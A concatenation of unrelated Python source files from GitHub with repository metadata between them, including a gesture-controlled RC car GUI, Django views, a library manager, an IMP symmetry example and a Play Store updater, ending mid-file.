clientSock.connect((url, 2000))
mp_drawing = mp.solutions.drawing_utils
mp_hands = mp.solutions.hands
## ==> GLOBALS
counter = 0
hands = None
cap_hand = None
cap_situ = None
right_prev = None
left_prev = None
left_count = 0
#Camera Command
camera_left = 0
camera_right = 0
camera_center = 0
# YOUR APPLICATION
class MainWindow(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.logic_btn = False
# self.logic_dr = False
self.case = 0
# 버튼을 누르면 함수 실행
self.ui.pushButton.clicked.connect(self.btnClicked)
# self.ui.pushButton_2.clicked.connect(self.drClicked)
# set warning
self.ui.warning.setVisible(False)
# self.ui.warning.setVisible(False)
# set wait
self.ui.wait.setVisible(False)
def start(self):
global cap_hand
global cap_situ
global hands
global right_prev
global left_prev
global left_count
global camera_center
global camera_left
global camera_right
turn_on_esp = 0
while cap_hand.isOpened():
success, image = cap_hand.read()
success2, image2 = cap_situ.read()
if not success:
break
if not success2:
break
if success:
if turn_on_esp == 0:
esp_trd = threading.Thread(target=esp32_video, name="[Daemon2]", args=())
esp_trd.setDaemon(True)
esp_trd.start()
turn_on_esp += 1
# Resize Image
image = cv2.resize(image, dsize=(800, 600))
# Flip the image horizontally for a later selfie-view display, and convert
# the BGR image to RGB.
image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB)
# To improve performance, optionally mark the image as not writeable to
# pass by reference.
image.flags.writeable = False
results = hands.process(image)
# Draw the hand annotations on the image.
image.flags.writeable = True
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
landmark = []
landmark_list = []
cnt = 0
cnt2 = 0
# Count number of loop when left hand gesture is not used
left_count += 1
# Interpret Hand Gesture & Control RC Car
if results.multi_hand_landmarks:
for hand_landmarks in results.multi_hand_landmarks:
for i in str(hand_landmarks).split():
is_num = bool(re.findall('\d+', i))
# Extract landmarks
if is_num is True:
if cnt < 3 and cnt2 == 0:
landmark.append(float(i))
cnt += 1
elif cnt == 3 and cnt2 == 0:
cnt2 = 1
elif cnt == 3 and cnt2 == 1:
cnt = 0
cnt2 = 0
if len(landmark) == 3:
landmark_list.append(landmark)
landmark = []
# Right Hand Gesture Controls
if find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1])) != "None" and\
handedness(landmark_list[0], landmark_list[1]) == 'right':
cmd = find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1]))
if right_prev != cmd:
right_prev = cmd
# Create Thread
t = threading.Thread(target=url_command_right, name="[Daemon]", args=(cmd,))
t.setDaemon(True)
t.start()
# Left Hand Gesture Controls
if find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1])) != "None" and\
handedness(landmark_list[0], landmark_list[1]) == 'left':
cmd = find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1]))
# Camera Command
if cmd == "Camera_LEFT" or cmd == "Camera_RIGHT" or cmd == "Camera_CENTER":
if cmd == "Camera_LEFT" and camera_left == 0:
left_prev = cmd
left_count = 0
camera_left = 1
camera_right = 0
camera_center = 0
# Create Thread
t = threading.Thread(target=url_command_left, name="[Daemon5]", args=(cmd,))
t.setDaemon(True)
t.start()
elif cmd == "Camera_RIGHT" and camera_right == 0:
left_prev = cmd
left_count = 0
camera_left = 0
camera_right = 1
camera_center = 0
# Create Thread
t = threading.Thread(target=url_command_left, name="[Daemon6]", args=(cmd,))
t.setDaemon(True)
t.start()
elif cmd == "Camera_CENTER" and camera_center == 0:
left_prev = cmd
left_count = 0
camera_left = 0
camera_right = 0
camera_center = 1
# Create Thread
t = threading.Thread(target=url_command_left, name="[Daemon7]", args=(cmd,))
t.setDaemon(True)
t.start()
if cmd == "Capture" and left_count > 3:
left_prev = cmd
left_count = 0
img_name = 'image/input.png'
cv2.imwrite(img_name, image2)
# SR Command
if left_prev != cmd and (cmd != "Camera_LEFT" or cmd != "Camera_RIGHT" or cmd != "Capture"):
left_prev = cmd
if cmd == "Work SR Engine":
t = threading.Thread(target=sr_work, name="[Daemon4]", args=())
t.setDaemon(True)
t.start()
self.ui.wait.setVisible(True)
if cmd == "SR Done":
self.ui.wait.setVisible(False)
print(find_gesture(define_gesture(landmark_list),
handedness(landmark_list[0], landmark_list[1])))
print(handedness(landmark_list[0], landmark_list[1]))
self.ui.cmd.setText(f"{find_gesture(define_gesture(landmark_list), handedness(landmark_list[0], landmark_list[1]))}\n"
f"{handedness(landmark_list[0], landmark_list[1])}")
self.ui.cmd.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
self.ui.cmd.repaint()
mp_drawing.draw_landmarks(
image, hand_landmarks, mp_hands.HAND_CONNECTIONS)
self.displayHandSign(image)
self.displayCCTV(image2)
#self.displayRCCAR(image2)
self.displayCaptureImg()
self.displaySRImg()
#Keyboard
k = cv2.waitKey(0)
if k % 256 == 27:
# esc pressed --> break
break
elif k % 256 == 32:
# space pressed --> capture
img_name = '../../image/input.png'
cv2.imwrite(img_name, image)
hands.close()
cap_hand.release()
cap_situ.release()
cv2.destroyAllWindows()
def btnClicked(self):
if self.logic_btn == True:
self.logic_btn = False
# self.ui.rccarCam.setPixmap(None)
self.case += 1
self.ui.lcdNumber.display(self.case)
self.ui.warning.setVisible(False)
# self.ui.wait.setVisible(False)
# space pressed --> capture
else:
self.logic_btn = True
self.ui.warning.setVisible(True)
# self.ui.wait.setVisible(True)
def displayHandSign(self, img):
qformat = QImage.Format_Indexed8
if len(img.shape) == 3:
if img.shape[2] == 4:
qformat = QImage.Format_RGBA8888
else:
qformat = QImage.Format_RGB888
img = QImage(img, img.shape[1], img.shape[0], qformat)
img = img.rgbSwapped()
w = self.ui.handSign.width()
h = self.ui.handSign.height()
self.ui.handSign.setPixmap(QPixmap.fromImage(img).scaled(w, h, Qt.KeepAspectRatioByExpanding))
# self.ui.handSign.setPixmap(QPixmap.fromImage(img))
# 가운데 맞춤
self.ui.handSign.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
def displayRCCAR(self, img):
qformat = QImage.Format_Indexed8
if len(img.shape) == 3:
if img.shape[2] == 4:
qformat = QImage.Format_RGBA8888
else:
qformat = QImage.Format_RGB888
img = QImage(img, img.shape[1], img.shape[0], qformat)
img = img.rgbSwapped()
w = self.ui.handSign.width()
h = self.ui.handSign.height()
self.ui.cctv.setPixmap(QPixmap.fromImage(img).scaled(w, h, Qt.KeepAspectRatioByExpanding))
# self.ui.cctv.setPixmap(QPixmap.fromImage(img))
# 가운데 맞춤
self.ui.cctv.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
# self.ui.situation2.setPixmap(QPixmap.fromImage(img))
# # 가운데 맞춤
# self.ui.situation2.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
def displayCCTV(self, img):
qformat = QImage.Format_Indexed8
if len(img.shape) == 3:
if img.shape[2] == 4:
qformat = QImage.Format_RGBA8888
else:
qformat = QImage.Format_RGB888
img = QImage(img, img.shape[1], img.shape[0], qformat)
img = img.rgbSwapped()
w = self.ui.handSign.width()
h = self.ui.handSign.height()
self.ui.rccarCam.setPixmap(QPixmap.fromImage(img).scaled(w, h, Qt.KeepAspectRatioByExpanding))
# self.ui.rccarCam.setPixmap(QPixmap.fromImage(img))
# 가운데 맞춤
self.ui.rccarCam.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
def displayCaptureImg(self):
img = QPixmap.fromImage('../../image/input.png')
w = self.ui.cap_img.width()
h = self.ui.cap_img.height()
self.ui.cap_img.setPixmap(img.scaled(w, h, Qt.KeepAspectRatioByExpanding))
# 가운데 맞춤
self.ui.cap_img.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
def displaySRImg(self):
img = QPixmap.fromImage('../../image/upscaled.png')
w = self.ui.sr_img.width()
h = self.ui.sr_img.height()
self.ui.sr_img.setPixmap(img.scaled(w, h, Qt.KeepAspectRatioByExpanding))
# 가운데 맞춤
self.ui.sr_img.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)
# SPLASH SCREEN
class SplashScreen(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.ui = Ui_SplashScreen()
self.ui.setupUi(self)
## REMOVE TITLE BAR
self.setWindowFlag(QtCore.Qt.FramelessWindowHint)
self.setAttribute(QtCore.Qt.WA_TranslucentBackground)
## DROP SHADOW EFFECT
self.shadow = QGraphicsDropShadowEffect(self)
self.shadow.setBlurRadius(20)
self.shadow.setXOffset(0)
self.shadow.setYOffset(0)
self.shadow.setColor(QColor(0, 0, 0, 60))
self.ui.dropShadowFrame.setGraphicsEffect(self.shadow)
## QTIMER ==> START
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.progress)
# TIMER IN MILLISECONDS
self.timer.start(35)
# # Change Texts
# QtCore.QTimer.singleShot(1500, lambda: self.ui.label_description.setText("<strong>LOADING</strong> DATABASE"))
# QtCore.QTimer.singleShot(3000, lambda: self.ui.label_description.setText("<strong>LOADING</strong> USER INTERFACE"))
## SHOW ==> MAIN WINDOW
self.show()
## ==> APP FUNCTIONS
def progress(self):
global counter
global hands
global cap_hand
global cap_situ
# SET VALUE TO PROGRESS BAR
self.ui.progressBar.setValue(counter)
if hands is None:
self.ui.label_loading.setText("load mediapipe...")
self.ui.label_loading.repaint()
hands = mp_hands.Hands(
min_detection_confidence=0.7, min_tracking_confidence=0.5)
cap_hand = cv2.VideoCapture(0)
cap_situ = cv2.VideoCapture(1)
counter = 20
self.ui.label_loading.setText("loading...")
# CLOSE SPLASH SCREE AND OPEN APP
if counter > 100:
# STOP TIMER
self.timer.stop()
# SHOW MAIN WINDOW
self.main = MainWindow()
self.main.show()
# CLOSE SPLASH SCREEN
self.close()
# START MAIN SCREEN
self.main.start()
# INCREASE COUNTER
counter += 4
def url_command_right(cmd):
try:
clientSock.send(cmd.encode('utf-8'))
except:
print("\n\n\n\nException Occur\n\n\n\n")
def url_command_left(cmd):
try:
clientSock.send(cmd.encode('utf-8'))
time.sleep(10)
except:
print("\n\n\n\nException Occur\n\n\n\n")
def esp32_video():
# change to your ESP32-CAM ip
wd = webdriver.Chrome(r'C:\Users\jji44\Desktop\chromedriver.exe')
url = 'http://192.168.43.159:81/stream'
wd.set_window_size(400, 400)
#wd.set
wd.get(url)
# url = "http://192.168.0.152:81/stream"
# CAMERA_BUFFRER_SIZE = 4096#4096
# stream = urlopen(url)
# bts = b''
#
# while True:
# try:
# bts += stream.read(CAMERA_BUFFRER_SIZE)
# jpghead = bts.find(b'\xff\xd8')
# jpgend = bts.find(b'\xff\xd9')
# if jpghead > -1 and jpgend > -1:
# jpg = bts[jpghead:jpgend + 2]
# bts = bts[jpgend + 2:]
# image3 = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
# image3 = cv2.resize(image3, (640, 480))
# MainWindow.displayRCCAR(window.main, image3)
# except Exception as e:
# print("Error:" + str(e))
# bts = b''
# stream = urlopen(url)
# continue
if __name__ == "__main__":
app = QApplication(sys.argv)
window = SplashScreen()
try:
sys.exit(app.exec_())
except:
print('exciting')
|
cheeseBG/EmergencyResponseSystem
|
main.py
|
main.py
|
py
| 17,061 |
python
|
en
|
code
| 1 |
github-code
|
6
|
39635306222
|
from datetime import datetime
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.template import loader
from django.urls import reverse
from .models import BusinessIdea
# Create your views here.
def list(request):
ideas_list = BusinessIdea.objects.order_by("-publish_date")[:10]
template = loader.get_template('ideas/list.html')
context = {
'ideas_list': ideas_list,
}
return HttpResponse(template.render(context, request))
def idea(request, idea_id):
try:
idea = BusinessIdea.objects.get (pk=idea_id)
except BusinessIdea.DoesNotExist:
raise Http404("Idea does not exist")
#comments = IdeaComment.objects.filter()
print(idea.__dir__())
return render(request, 'ideas/detail.html', {"idea": idea, "comments": ""})
def idea_new(request):
return render(request, "ideas/idea_new.html")
def idea_new_post(request):
print(request.POST.keys())
try:
username = request.POST['username']
title = request.POST["title"]
body = request.POST["body"]
except (KeyError):
# Redisplay the form.
return render(request, 'ideas/idea_new.html', {
'error_message': "Invalid form.",
})
newIdea = BusinessIdea(
username = username,
title = title,
body = body,
publish_date = datetime.now()
)
newIdea.save()
context = {
"idea": newIdea
}
return HttpResponseRedirect(reverse("ideas:idea", args=(newIdea.id,)))
|
Gael-Bernard/business_ideas_upm
|
business_ideas_upm/ideas/views.py
|
views.py
|
py
| 1,571 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38093763953
|
from book import Book
class Library:
def __init__(self, books_list, readers_list):
self.books_list = books_list
self.readers_list = readers_list
def add_book_to_library(self):
book_id, book_name, book_author, book_date = input("Please enter book id, title, author name, year of edition "
"split by comma as in the example '4,River,Anthony Bach,"
"1956': ").split(',')
book = Book(book_id, book_name, book_author, book_date, None)
return self.books_list.append(book)
def delete_book_from_library(self):
book_id = input("Please enter book id: ")
for book in self.books_list:
if book.book_id == int(book_id):
self.books_list.remove(book)
@staticmethod
def ask_for_ids():
while True:
book_id, reader_id = input("Please enter book id and reader id split by comma: ").split(',')
if book_id.isdigit() and reader_id.isdigit():
return int(book_id), int(reader_id)
else:
print("You have entered not a valid positive integers as ids.")
def give_book_to_reader(self, book_id, reader_id):
for book in self.books_list:
if book.book_id == book_id and book.book_id_reader is not None:
print("This book is already taken.")
break
elif book.book_id == book_id:
book.book_id_reader = reader_id
for reader in self.readers_list:
if reader.reader_id == reader_id:
reader.reader_book_id = book_id
def take_book_from_reader(self, book_id, reader_id):
for book in self.books_list:
if book.book_id == book_id and book.book_id_reader is None:
print("This book is not taken.")
break
elif book.book_id == book_id:
book.book_id_reader = None
for reader in self.readers_list:
if reader.reader_id == reader_id:
reader.reader_book_id = None
def print_all_books(self):
for book in self.books_list:
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def print_books_in_library(self):
for book in self.books_list:
if book.book_id_reader is None:
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def print_taken_books(self):
for book in self.books_list:
if book.book_id_reader is not None:
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def sort_books_by_name(self):
for book in sorted(self.books_list, key=lambda x: x.book_name):
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def sort_books_by_author(self):
for book in sorted(self.books_list, key=lambda x: x.book_author):
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def sort_books_by_date(self):
for book in sorted(self.books_list, key=lambda x: x.book_date):
print(book.book_id, book.book_name, book.book_author, book.book_date, book.book_id_reader)
def delete_reader(self):
reader_id = input("Please enter reader id: ")
for reader in self.readers_list:
if reader.reader_id == int(reader_id):
self.readers_list.remove(reader)
def print_all_readers(self):
for reader in self.readers_list:
print(reader.reader_id, reader.first_name, reader.last_name, reader.birth_year, reader.reader_book_id)
def print_readers_with_book(self):
for reader in self.readers_list:
if reader.reader_book_id is not None:
print(reader.reader_id, reader.first_name, reader.last_name, reader.birth_year, reader.reader_book_id)
|
alisa-moto/python-adnanced
|
HW_02/library.py
|
library.py
|
py
| 4,100 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33937872661
|
"""
Returns a dictionary of the keyboard
mapped to its ord() value.
string DATA
ascii_letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
ascii_lowercase = 'abcdefghijklmnopqrstuvwxyz'
digits = '0123456789'
hexdigits = '0123456789abcdefABCDEF'
letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
octdigits = '01234567'
printable = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU...
punctuation = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
whitespace = '\t\n\x0b\x0c\r '
"""
import string
import curses
class Key():
def __init__(self):
self.key = {}
for k in string.printable:
self.key[k] = ord(k)
for k in dir(curses):
if 'KEY_' in k:
name = k.split('_')[1].lower()
self.key[name] = getattr(curses, k)
return
key = Key().key
|
cameronbriar/curses
|
examples/key.py
|
key.py
|
py
| 934 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71066840189
|
import numpy as np
from examples.example_imports import *
scene = EagerModeScene()
scene.save_default_config()
number = DecimalNumber(0).scale(2)
scene.add(number)
scene.wait()
print(np.linspace(0, 10, 4))
scene.play(ChangingDecimal(number, lambda x: x*10), run_time=4)
scene.hold_on()
|
beidongjiedeguang/manim-express
|
examples/animate/demo_numbers.py
|
demo_numbers.py
|
py
| 291 |
python
|
en
|
code
| 13 |
github-code
|
6
|
43555685205
|
class Robot:
"""
+Y
90
N
^
-X 180 W < * > E 0 +X
v
S
270
-Y
"""
# dirname => (dx, dy)
directions_to_deltas = {
'E': (1, 0),
'N': (0, 1),
'W': (-1, 0),
'S': (0, -1)
}
def __init__(self, instructions):
self.instructions = instructions
self.x = 0
self.y = 0
self.wx = 10
self.wy = 1
def execute_command(self, cmd, val):
if cmd in {'N', 'S', 'E', 'W'}:
dx, dy = self.directions_to_deltas[cmd]
self.wx += dx * val
self.wy += dy * val
elif cmd in {'L', 'R'}:
normal_val = val if cmd == 'R' else (val * -1) % 360
if normal_val == 90:
temp = self.wx
self.wx = self.wy
self.wy = -1 * temp
elif normal_val == 180:
self.wx *= -1
self.wy *= -1
elif normal_val == 270:
temp = self.wx
self.wx = -1 * self.wy
self.wy = temp
else:
raise ValueError("I don't know how to rotate {val} degrees!")
elif cmd == 'F':
self.x += val * self.wx
self.y += val * self.wy
else:
raise ValueError("Unrecognized command {cmd}")
self.print_state(cmd,val)
def run_to_completion(self):
for cmd, val in self.instructions:
self.execute_command(cmd, val)
def print_state(self, cmd, val):
print(f"After {cmd, val}\n Pos: {self.x, self.y}\n Way: {self.wx, self.wy}\n")
def main():
instructions = []
with open("input.txt") as file:
for line in file:
instructions.append((line[:1], int(line[1:].strip())))
robot = Robot(instructions)
robot.run_to_completion()
m_dist = abs(robot.x) + abs(robot.y)
print(f"Coord: ({robot.x}, {robot.y}) Man_Distance: {m_dist}")
if __name__ == "__main__":
main()
|
ruke47/advent-of-code-2020
|
12/2.py
|
2.py
|
py
| 2,071 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11403898752
|
from torch.utils.data import Dataset
from transformers import Trainer
from transformers import TrainingArguments
from trainer.callbacks.printer import PrinterCallback
from data_manager.batch_sampler import Batch_Sampler
from model.model_parameters import Model_Parameters
from trainer.tne_config import TNE_Config
import torch
import os
import json
os.environ["WANDB_DISABLED"] = "true"
class TNETrainer():
def __init__(self, model: torch.nn.Module, train_set: Dataset, evaluation_set: Dataset, test_set: Dataset,
config: TNE_Config, hyper_parameters: Model_Parameters) -> None:
# Init Trainer properties
self.model = model
self.config = config
self.prepositions_list = config.prepositions_list
self.num_labels = config.num_labels
#################################################
# Init TNE Model #
#################################################
self.train_set = train_set
self.evaluation_set = evaluation_set
self.test_set = test_set
self.test_output_path = self.config.test_output
self.hyper_parameters = hyper_parameters
self.model = model
#################################################
# Init Training Arguments #
#################################################
training_params = hyper_parameters.training_params
evaluation_params = hyper_parameters.evaluation_params
self.training_args = TrainingArguments(output_dir=config.output_dir,
num_train_epochs=training_params["epochs"],
per_device_train_batch_size=training_params['batch_size'],
per_device_eval_batch_size=evaluation_params['batch_size'],
learning_rate=training_params['learning_rate'],
weight_decay=training_params['weight_decay'],
warmup_steps=training_params['warmup_steps'],
logging_dir=config.logs_dir,
logging_steps=5000, # log & save weights each logging_steps
evaluation_strategy="steps", # evaluate each `logging_steps`
eval_steps=evaluation_params['eval_steps'],
save_strategy="no")
#############################################
# Init Trainer #
#############################################
# Metrics
self.batch_collator = Batch_Sampler(tokenizer=self.config.tokenizer,
device_type=self.config.device)
self.trainer = Trainer(
model=self.model, # TNE model
args=self.training_args, # Training arguments, defined above
train_dataset=self.train_set, # Training set
eval_dataset=self.evaluation_set, # Evaluation set
#compute_metrics=self.metrics.compute_metrics, # Callback that computes metrics of interest
callbacks=[
# a printer callback used to draw a graph showing the
# evaluation accuracy of the model over the epochs in the training.
PrinterCallback
],
data_collator=self.batch_collator,
)
def train(self):
# train the model
self.trainer.train()
def evaluate(self):
# evaluate the model performance
self.trainer.evaluate()
def test(self):
# test the model and create a file with the predicted prepositions.
with open(self.test_output_path, 'w') as outfile:
for sample in self.test_set:
batch = self.batch_collator.__call__(batch=[sample])
predictions = self.model(batch['input'], None)
predictions[predictions == 25] = 0
predictions_json = json.dumps({'predicted_prepositions': predictions.flatten().tolist()})
outfile.write(predictions_json + "\n")
|
ranraboh/TNE_TASK
|
trainer/tne_trainer.py
|
tne_trainer.py
|
py
| 4,430 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43431205524
|
import datetime
import uuid
import logging
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import pandas as pd
import sys
import pprint
import traceback
from core.scraper.scraper import Scraper
from core.db.db_helper import DbHelper
from common.constants import THREAD_NO, LARGE_CHUNK, BULK_CHUNK
from common.protobuf_to_dict.protobuf_to_dict.convertor import protobuf_to_dict
from common.app_object import App
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
level=logging.INFO)
pp = pprint.PrettyPrinter(indent=4)
class Updater:
"""
Keeps iterating over the database till the script is interrupted and
collecting meta-data for apps that have previously been scraped.
"""
def __init__(self, input_file=None):
self.__db_helper = DbHelper()
self.input_file = input_file
# ***************** #
# updating all related functions
# ***************** #
def update_apps(self):
"""
Uses bulk scraping to update apps much faster than before
"""
if self.input_file is None:
# dicts representing each app and info e.g. current version code, uuid, etc.
apps = self.__db_helper.get_package_names_to_update(0)
else:
apps = pd.read_csv(self.input_file)["packageName"].tolist()
self.s = Scraper()
app_names = []
app_data = []
removed_apps = []
total_apps_no = len(apps)
logger.info("Starting bulk update with {} apps...".format(total_apps_no))
with ThreadPoolExecutor(max_workers=THREAD_NO) as executor:
res = executor.map(self.update_all_thread_worker,
range(0, total_apps_no), apps)
counter = 0
for future in res:
if future is not None:
app_names.append(future[0])
if future[1] is not None and future[2] is not None:
app_data.append((future[1], future[2]))
else:
removed_apps.append(future[0])
counter += 1
if counter % LARGE_CHUNK == 0:
logger.info("updated {} to {} out of {}".format(
counter - LARGE_CHUNK, counter, total_apps_no))
if counter % (BULK_CHUNK * 10) == 0:
logger.info("updating {} apps as removed".format(len(removed_apps)))
self.__db_helper.update_apps_as_removed(removed_apps)
removed_apps = []
try:
logger.info("inserting {} updated apps to db...".format(len(app_data)))
self.__db_helper.insert_apps_into_db(app_data)
app_data = []
except Exception as e:
logger.error("db insertion failed - {}".format(e))
print(traceback.format_exc())
logger.error(traceback.format_exc())
logger.info("completed all out of {}".format(total_apps_no))
logger.info("updating {} apps as removed".format(len(removed_apps)))
self.__db_helper.update_apps_as_removed(removed_apps)
logger.info("inserting {} updated apps to db...".format(len(app_data)))
self.__db_helper.insert_apps_into_db(app_data)
self.__db_helper.update_apps_as_not_removed(app_names)
self.__db_helper.update_date_last_scraped(app_names,
datetime.datetime.utcnow().strftime("%Y%m%dT%H%M"))
def update_all_thread_worker(self, index, app_name):
# bulk scrape to check for updates
s = self.s
"""
try:
"""
metadata = s.get_metadata_for_apps([app_name], bulk=False)
if metadata is None:
# app removed
return (app_name, None, None)
if len(list(metadata)) == 0:
return (app_name, None, None)
new_info, new_detail = list(metadata)[0]
num_updated = 0
if new_info is None:
# app is removed
logger.error("app {} has been removed".format(app_name))
return (app_name, None, None)
if new_info.packageName != app_name: # TODO why
logger.error("mismatching package names")
return
if new_info.versionCode is None or new_info.uploadDate is None:
# TODO add crawler code here to fix this, ignore for now
logger.warning("{} - null versionCode or uploadDate, ignoring".format(app_name))
return
return (app_name, new_info, new_detail)
"""
if new_info.versionCode is not None:
info_vc = new_info.versionCode
details_dict = protobuf_to_dict(new_detail)
if info_vc != details_dict["details"]["appDetails"]["versionCode"]:
logger.error("VERSION MISMATCH for {}".format(app_name))
return
# check version code to see if app is updated
updated = self.__db_helper.check_app_to_update(app_name, new_info.versionCode)
else:
# if not provided just assume is updated
updated = True
if updated:
return (app_name, new_info, new_detail)
else:
return None
"""
"""
except Exception as e:
logger.error("{} - {}".format(app_name, str(e)))
"""
"""
if __name__ == '__main__':
while True:
try:
up = Updater()
up.update_apps()
except KeyboardInterrupt:
logger.warning("Updater interrupted by user")
"""
|
CMUChimpsLab/playstore-scraper
|
core/scraper/updater.py
|
updater.py
|
py
| 5,745 |
python
|
en
|
code
| 1 |
github-code
|
6
|
2088894049
|
## \example pmi/symmetry.py
"""Clone molecules and use a symmetry constraint
"""
import IMP
import IMP.atom
import IMP.rmf
import IMP.pmi
import IMP.pmi.topology
import IMP.pmi.dof
import IMP.pmi.macros
import IMP.pmi.restraints.stereochemistry
import math
import sys
IMP.setup_from_argv(sys.argv, "Symmetry constraint example")
# Create System and State
mdl = IMP.Model()
s = IMP.pmi.topology.System(mdl)
st = s.create_state()
# Create a simple all-bead molecule
mol = st.create_molecule("mymol", sequence='A'*10, chain_id='A')
mol.add_representation(mol, resolutions=[1])
# Clone the molecule multiple times
# Calling molecule.create_clone makes a new molecule with the same name,
# sequence, initial structure, and choice of representations
# Note: another function, molecule.create_copy(), just copies the name
# and sequence
mols = [mol]
chains = 'BCDEFGHI'
for nc in range(7):
clone = mol.create_clone(chains[nc])
mols.append(clone)
hier = s.build()
# Create a symmetry constraint
# A constraint is invariant: IMP will automatically move all clones to
# match the reference
# If instead you want some more flexibility, consider
# IMP.pmi.restraints.stereochemistry.SymmetryRestraint
dof = IMP.pmi.dof.DegreesOfFreedom(mdl)
center = IMP.algebra.Vector3D([50, 0, 0])
for nc in range(7):
rot = IMP.algebra.get_rotation_about_axis([0, 0, 1], 2*math.pi*(nc+1)/8)
transform = IMP.algebra.get_rotation_about_point(center, rot)
dof.constrain_symmetry(mols[0], mols[nc+1], transform)
mdl.update() # propagates coordinates
# ########### Make stuff look cool with restraints ###########
# set up the original molecule as flexible beads
dof.create_flexible_beads(mols[0])
# Create a connectivity restraint for the first molecule
cr = IMP.pmi.restraints.stereochemistry.ConnectivityRestraint(objects=mol)
cr.add_to_model()
# Create excluded volume for all particles
evr = IMP.pmi.restraints.stereochemistry.ExcludedVolumeSphere(
included_objects=mols)
evr.add_to_model()
# Quickly move all flexible beads into place
dof.optimize_flexible_beads(100)
# write a single-frame RMF to view the helix
out = IMP.pmi.output.Output()
out.init_rmf("example_symmetry.rmf3", hierarchies=[hier])
out.write_rmf("example_symmetry.rmf3")
|
salilab/pmi
|
examples/symmetry.py
|
symmetry.py
|
py
| 2,257 |
python
|
en
|
code
| 12 |
github-code
|
6
|
16838024238
|
from typing import List
from csvcubed.models.cube import (
Cube,
QbDimension,
ExistingQbDimension,
QbColumn,
CsvColumnUriTemplateMissingError,
QbAttributeLiteral,
CsvColumnLiteralWithUriTemplate,
QbAttribute,
NoDimensionsDefinedError,
)
from csvcubed.models.validationerror import ValidationError
from csvcubed.utils.qb.cube import get_columns_of_dsd_type
from csvcubed.utils.qb.validation.observations import (
validate_observations,
)
def validate_qb_component_constraints(cube: Cube) -> List[ValidationError]:
"""
Validate a :class:`QbCube` to highlight errors in configuration.
:return: A list of :class:`ValidationError <csvcubed.models.validationerror.ValidationError>` s.
"""
errors = _validate_dimensions(cube)
errors += _validate_attributes(cube)
errors += validate_observations(cube)
return errors
def _validate_dimensions(cube: Cube) -> List[ValidationError]:
errors: List[ValidationError] = []
dimension_columns = get_columns_of_dsd_type(cube, QbDimension)
for c in cube.columns:
if isinstance(c, QbColumn) and isinstance(
c.structural_definition, ExistingQbDimension
):
if c.csv_column_uri_template is None:
errors.append(
CsvColumnUriTemplateMissingError(
c.csv_column_title, ExistingQbDimension
)
)
if len(dimension_columns) == 0:
errors.append(NoDimensionsDefinedError())
return errors
def _validate_attributes(cube: Cube) -> List[ValidationError]:
errors: List[ValidationError] = []
for c in cube.columns:
if isinstance(c, QbColumn) and isinstance(c.structural_definition, QbAttribute):
if isinstance(c.structural_definition, QbAttributeLiteral):
if c.csv_column_uri_template is not None:
errors.append(
CsvColumnLiteralWithUriTemplate(
c.csv_column_title,
f"{c.structural_definition.__class__.__name__} "
+ "cannot have a uri_tempate as it holds literal values",
)
)
else:
# Not a QbAttributeLiteral
if (
c.csv_column_uri_template is None
and len(c.structural_definition.new_attribute_values) == 0 # type: ignore
):
errors.append(
CsvColumnUriTemplateMissingError(
c.csv_column_title,
f"{c.structural_definition.__class__.__name__} using existing attribute values",
)
)
return errors
|
GDonRanasinghe/csvcubed-models-test-5
|
csvcubed/csvcubed/utils/qb/validation/cube.py
|
cube.py
|
py
| 2,817 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26304099314
|
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core.exceptions import ObjectDoesNotExist
from django.shortcuts import get_object_or_404, redirect, render, reverse
from django.utils import timezone
from django.views import generic
from paypal.standard.forms import PayPalPaymentsForm
from django.http import HttpRequest, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from .forms import CheckoutForm
from .models import ProdukItem, OrderProdukItem, Order, AlamatPengiriman, Payment
class HomeListView(generic.ListView):
template_name = 'home.html'
queryset = ProdukItem.objects.all()
paginate_by = 4
class ContactView(generic.ListView):
template_name = 'kontak.html'
queryset = ProdukItem.objects.all()
paginate_by = 4
class ProductListView(generic.ListView):
template_name = 'list_produk.html'
queryset = ProdukItem.objects.all()
paginate_by = 4
class ProductDetailView(generic.DetailView):
